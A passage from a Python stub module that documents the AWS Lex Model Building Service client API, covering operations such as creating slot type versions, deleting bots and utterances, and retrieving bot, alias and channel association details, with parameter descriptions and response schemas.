LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
:returns:
(string) --
"""
pass
def create_slot_type_version(name=None, checksum=None):
"""
Creates a new version of a slot type based on the $LATEST version of the specified slot type. If the $LATEST version of this resource has not changed since the last version that you created, Amazon Lex doesn\'t create a new version. It returns the last version that you created.
When you create a version of a slot type, Amazon Lex sets the version to 1. Subsequent versions increment by 1. For more information, see versioning-intro .
This operation requires permissions for the lex:CreateSlotTypeVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.create_slot_type_version(
name='string',
checksum='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type that you want to create a new version for. The name is case sensitive.\n
:type checksum: string
:param checksum: Checksum for the $LATEST version of the slot type that you want to publish. If you specify a checksum and the $LATEST version of the slot type has a different checksum, Amazon Lex returns a PreconditionFailedException exception and doesn\'t publish the new version. If you don\'t specify a checksum, Amazon Lex publishes the $LATEST version.
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
Response Structure
(dict) --
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
enumerationValues (list) --
A list of EnumerationValue objects that defines the values that the slot type can take.
(dict) --
Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.
For example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values
thick
thin
stuffed
value (string) --
The value of the slot type.
synonyms (list) --
Additional values related to the slot type value.
(string) --
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last update date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version assigned to the new slot type version.
checksum (string) --
Checksum of the $LATEST version of the slot type.
valueSelectionStrategy (string) --
The strategy that Amazon Lex uses to determine the value of the slot. For more information, see PutSlotType .
parentSlotTypeSignature (string) --
The built-in slot type used a the parent of the slot type.
slotTypeConfigurations (list) --
Configuration information that extends the parent built-in slot type.
(dict) --
Provides configuration information for a slot type.
regexConfiguration (dict) --
A regular expression used to validate the value of a slot.
pattern (string) --
A regular expression used to validate the value of a slot.
Use a standard regular expression. Amazon Lex supports the following characters in the regular expression:
A-Z, a-z
0-9
Unicode characters ("u<Unicode>")
Represent Unicode characters with four digits, for example "u0041" or "u005A".
The following regular expression operators are not supported:
Infinite repeaters: *, +, or {x,} with no upper bound.
Wild card (.)
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
:returns:
thick
thin
stuffed
"""
pass
def delete_bot(name=None):
"""
Deletes all versions of the bot, including the $LATEST version. To delete a specific version of the bot, use the DeleteBotVersion operation. The DeleteBot operation doesn\'t immediately remove the bot schema. Instead, it is marked for deletion and removed later.
Amazon Lex stores utterances indefinitely for improving the ability of your bot to respond to user inputs. These utterances are not removed when the bot is deleted. To remove the utterances, use the DeleteUtterances operation.
If a bot has an alias, you can\'t delete it. Instead, the DeleteBot operation returns a ResourceInUseException exception that includes a reference to the alias that refers to the bot. To remove the reference to the bot, delete the alias. If you get the same exception again, delete the referring alias until the DeleteBot operation is successful.
This operation requires permissions for the lex:DeleteBot action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot(
name='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot. The name is case sensitive.\n
"""
pass
def delete_bot_alias(name=None, botName=None):
"""
Deletes an alias for the specified bot.
You can\'t delete an alias that is used in the association between a bot and a messaging channel. If an alias is used in a channel association, the DeleteBot operation returns a ResourceInUseException exception that includes a reference to the channel association that refers to the bot. You can remove the reference to the alias by deleting the channel association. If you get the same exception again, delete the referring association until the DeleteBotAlias operation is successful.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot_alias(
name='string',
botName='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the alias to delete. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot that the alias points to.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_bot_channel_association(name=None, botName=None, botAlias=None):
"""
Deletes the association between an Amazon Lex bot and a messaging platform.
This operation requires permission for the lex:DeleteBotChannelAssociation action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot_channel_association(
name='string',
botName='string',
botAlias='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the association. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the Amazon Lex bot.\n
:type botAlias: string
:param botAlias: [REQUIRED]\nAn alias that points to the specific version of the Amazon Lex bot to which this association is being made.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def delete_bot_version(name=None, version=None):
"""
Deletes a specific version of a bot. To delete all versions of a bot, use the DeleteBot operation.
This operation requires permissions for the lex:DeleteBotVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot_version(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot.\n
:type version: string
:param version: [REQUIRED]\nThe version of the bot to delete. You cannot delete the $LATEST version of the bot. To delete the $LATEST version, use the DeleteBot operation.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_intent(name=None):
"""
Deletes all versions of the intent, including the $LATEST version. To delete a specific version of the intent, use the DeleteIntentVersion operation.
You can delete a version of an intent only if it is not referenced. To delete an intent that is referred to in one or more bots (see how-it-works ), you must remove those references first.
This operation requires permission for the lex:DeleteIntent action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_intent(
name='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent. The name is case sensitive.\n
"""
pass
def delete_intent_version(name=None, version=None):
"""
Deletes a specific version of an intent. To delete all versions of a intent, use the DeleteIntent operation.
This operation requires permissions for the lex:DeleteIntentVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_intent_version(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent.\n
:type version: string
:param version: [REQUIRED]\nThe version of the intent to delete. You cannot delete the $LATEST version of the intent. To delete the $LATEST version, use the DeleteIntent operation.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_slot_type(name=None):
"""
Deletes all versions of the slot type, including the $LATEST version. To delete a specific version of the slot type, use the DeleteSlotTypeVersion operation.
You can delete a version of a slot type only if it is not referenced. To delete a slot type that is referred to in one or more intents, you must remove those references first.
This operation requires permission for the lex:DeleteSlotType action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_slot_type(
name='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type. The name is case sensitive.\n
"""
pass
def delete_slot_type_version(name=None, version=None):
"""
Deletes a specific version of a slot type. To delete all versions of a slot type, use the DeleteSlotType operation.
This operation requires permissions for the lex:DeleteSlotTypeVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_slot_type_version(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type.\n
:type version: string
:param version: [REQUIRED]\nThe version of the slot type to delete. You cannot delete the $LATEST version of the slot type. To delete the $LATEST version, use the DeleteSlotType operation.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_utterances(botName=None, userId=None):
"""
Deletes stored utterances.
Amazon Lex stores the utterances that users send to your bot. Utterances are stored for 15 days for use with the GetUtterancesView operation, and then stored indefinitely for use in improving the ability of your bot to respond to user input.
Use the DeleteUtterances operation to manually delete stored utterances for a specific user. When you use the DeleteUtterances operation, utterances stored for improving your bot\'s ability to respond to user input are deleted immediately. Utterances stored for use with the GetUtterancesView operation are deleted after 15 days.
This operation requires permissions for the lex:DeleteUtterances action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_utterances(
botName='string',
userId='string'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot that stored the utterances.\n
:type userId: string
:param userId: [REQUIRED]\nThe unique identifier for the user that made the utterances. This is the user ID that was sent in the PostContent or PostText operation request that contained the utterance.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_bot(name=None, versionOrAlias=None):
"""
Returns metadata information for a specific bot. You must provide the bot name and the bot version or alias.
This operation requires permissions for the lex:GetBot action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get configuration information for a bot.
Expected Output:
:example: response = client.get_bot(
name='string',
versionOrAlias='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot. The name is case sensitive.\n
:type versionOrAlias: string
:param versionOrAlias: [REQUIRED]\nThe version or alias of the bot.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
Response Structure
(dict) --
name (string) --
The name of the bot.
description (string) --
A description of the bot.
intents (list) --
An array of intent objects. For more information, see PutBot .
(dict) --
Identifies the specific version of an intent.
intentName (string) --
The name of the intent.
intentVersion (string) --
The version of the intent.
clarificationPrompt (dict) --
The message Amazon Lex uses when it doesn\'t understand the user\'s request. For more information, see PutBot .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
abortStatement (dict) --
The message that Amazon Lex returns when the user elects to end the conversation without completing it. For more information, see PutBot .
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
status (string) --
The status of the bot.
When the status is BUILDING Amazon Lex is building the bot for testing and use.
If the status of the bot is READY_BASIC_TESTING , you can test the bot using the exact utterances specified in the bot\'s intents. When the bot is ready for full testing or to run, the status is READY .
If there was a problem with building the bot, the status is FAILED and the failureReason field explains why the bot did not build.
If the bot was saved but not built, the status is NOT_BUILT .
failureReason (string) --
If status is FAILED , Amazon Lex explains why it failed to build the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
idleSessionTTLInSeconds (integer) --
The maximum time in seconds that Amazon Lex retains the data gathered in a conversation. For more information, see PutBot .
voiceId (string) --
The Amazon Polly voice ID that Amazon Lex uses for voice interaction with the user. For more information, see PutBot .
checksum (string) --
Checksum of the bot used to identify a specific revision of the bot\'s $LATEST version.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
locale (string) --
The target locale for the bot.
childDirected (boolean) --
For each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.
If your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.
detectSentiment (boolean) --
Indicates whether user utterances should be sent to Amazon Comprehend for sentiment analysis.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get configuration information for a bot.
response = client.get_bot(
name='DocOrderPizza',
versionOrAlias='$LATEST',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizzaBot',
'abortStatement': {
'messages': [
{
'content': 'I don't understand. Can you try again?',
'contentType': 'PlainText',
},
{
'content': 'I'm sorry, I don't understand.',
'contentType': 'PlainText',
},
],
},
'checksum': '20172ee3-fa06-49b2-bbc5-667c090303e9',
'childDirected': True,
'clarificationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'I'm sorry, I didn't hear that. Can you repeate what you just said?',
'contentType': 'PlainText',
},
{
'content': 'Can you say that again?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494360160.133,
'description': 'Orders a pizza from a local pizzeria.',
'idleSessionTTLInSeconds': 300,
'intents': [
{
'intentName': 'DocOrderPizza',
'intentVersion': '$LATEST',
},
],
'lastUpdatedDate': 1494360160.133,
'locale': 'en-US',
'status': 'NOT_BUILT',
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_bot_alias(name=None, botName=None):
"""
Returns information about an Amazon Lex bot alias. For more information about aliases, see versioning-aliases .
This operation requires permissions for the lex:GetBotAlias action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_alias(
name='string',
botName='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot alias. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
}
Response Structure
(dict) --
name (string) --
The name of the bot alias.
description (string) --
A description of the bot alias.
botVersion (string) --
The version of the bot that the alias points to.
botName (string) --
The name of the bot that the alias points to.
lastUpdatedDate (datetime) --
The date that the bot alias was updated. When you create a resource, the creation date and the last updated date are the same.
createdDate (datetime) --
The date that the bot alias was created.
checksum (string) --
Checksum of the bot alias.
conversationLogs (dict) --
The settings that determine how Amazon Lex uses conversation logs for the alias.
logSettings (list) --
The settings for your conversation logs. You can log text, audio, or both.
(dict) --
The settings for conversation logs.
logType (string) --
The type of logging that is enabled.
destination (string) --
The destination where logs are delivered.
kmsKeyArn (string) --
The Amazon Resource Name (ARN) of the key used to encrypt audio logs in an S3 bucket.
resourceArn (string) --
The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs are delivered.
resourcePrefix (string) --
The resource prefix is the first part of the S3 object key within the S3 bucket that you specified to contain audio logs. For CloudWatch Logs it is the prefix of the log stream name within the log group that you specified.
iamRoleArn (string) --
The Amazon Resource Name (ARN) of the IAM role used to write your logs to CloudWatch Logs or an S3 bucket.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_bot_aliases(botName=None, nextToken=None, maxResults=None, nameContains=None):
"""
Returns a list of aliases for a specified Amazon Lex bot.
This operation requires permissions for the lex:GetBotAliases action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_aliases(
botName='string',
nextToken='string',
maxResults=123,
nameContains='string'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of aliases. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of aliases, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of aliases to return in the response. The default is 50. .
:type nameContains: string
:param nameContains: Substring to match in bot alias names. An alias will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
ReturnsResponse Syntax
{
'BotAliases': [
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
BotAliases (list) --
An array of BotAliasMetadata objects, each describing a bot alias.
(dict) --
Provides information about a bot alias.
name (string) --
The name of the bot alias.
description (string) --
A description of the bot alias.
botVersion (string) --
The version of the Amazon Lex bot to which the alias points.
botName (string) --
The name of the bot to which the alias points.
lastUpdatedDate (datetime) --
The date that the bot alias was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot alias was created.
checksum (string) --
Checksum of the bot alias.
conversationLogs (dict) --
Settings that determine how Amazon Lex uses conversation logs for the alias.
logSettings (list) --
The settings for your conversation logs. You can log text, audio, or both.
(dict) --
The settings for conversation logs.
logType (string) --
The type of logging that is enabled.
destination (string) --
The destination where logs are delivered.
kmsKeyArn (string) --
The Amazon Resource Name (ARN) of the key used to encrypt audio logs in an S3 bucket.
resourceArn (string) --
The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs are delivered.
resourcePrefix (string) --
The resource prefix is the first part of the S3 object key within the S3 bucket that you specified to contain audio logs. For CloudWatch Logs it is the prefix of the log stream name within the log group that you specified.
iamRoleArn (string) --
The Amazon Resource Name (ARN) of the IAM role used to write your logs to CloudWatch Logs or an S3 bucket.
nextToken (string) --
A pagination token for fetching next page of aliases. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of aliases, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'BotAliases': [
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_bot_channel_association(name=None, botName=None, botAlias=None):
"""
Returns information about the association between an Amazon Lex bot and a messaging platform.
This operation requires permissions for the lex:GetBotChannelAssociation action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_channel_association(
name='string',
botName='string',
botAlias='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the association between the bot and the channel. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the Amazon Lex bot.\n
:type botAlias: string
:param botAlias: [REQUIRED]\nAn alias pointing to the specific version of the Amazon Lex bot to which this association is being made.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the association between the bot and the channel.
description (string) --
A description of the association between the bot and the channel.
botAlias (string) --
An alias pointing to the specific version of the Amazon Lex bot to which this association is being made.
botName (string) --
The name of the Amazon Lex bot.
createdDate (datetime) --
The date that the association between the bot and the channel was created.
type (string) --
The type of the messaging platform.
botConfiguration (dict) --
Provides information that the messaging platform needs to communicate with the Amazon Lex bot.
(string) --
(string) --
status (string) --
The status of the bot channel.
CREATED - The channel has been created and is ready for use.
IN_PROGRESS - Channel creation is in progress.
FAILED - There was an error creating the channel. For information about the reason for the failure, see the failureReason field.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to create the association.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
}
:returns:
(string) --
(string) --
"""
pass
def get_bot_channel_associations(botName=None, botAlias=None, nextToken=None, maxResults=None, nameContains=None):
"""
Returns a list of all of the channels associated with the specified bot.
The GetBotChannelAssociations operation requires permissions for the lex:GetBotChannelAssociations action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_channel_associations(
botName='string',
botAlias='string',
nextToken='string',
maxResults=123,
nameContains='string'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the Amazon Lex bot in the association.\n
:type botAlias: string
:param botAlias: [REQUIRED]\nAn alias pointing to the specific version of the Amazon Lex bot to which this association is being made.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of associations. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of associations, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of associations to return in the response. The default is 50.
:type nameContains: string
:param nameContains: Substring to match in channel association names. An association will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.' To return all bot channel associations, use a hyphen ('-') as the nameContains parameter.
:rtype: dict
ReturnsResponse Syntax
{
'botChannelAssociations': [
{
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
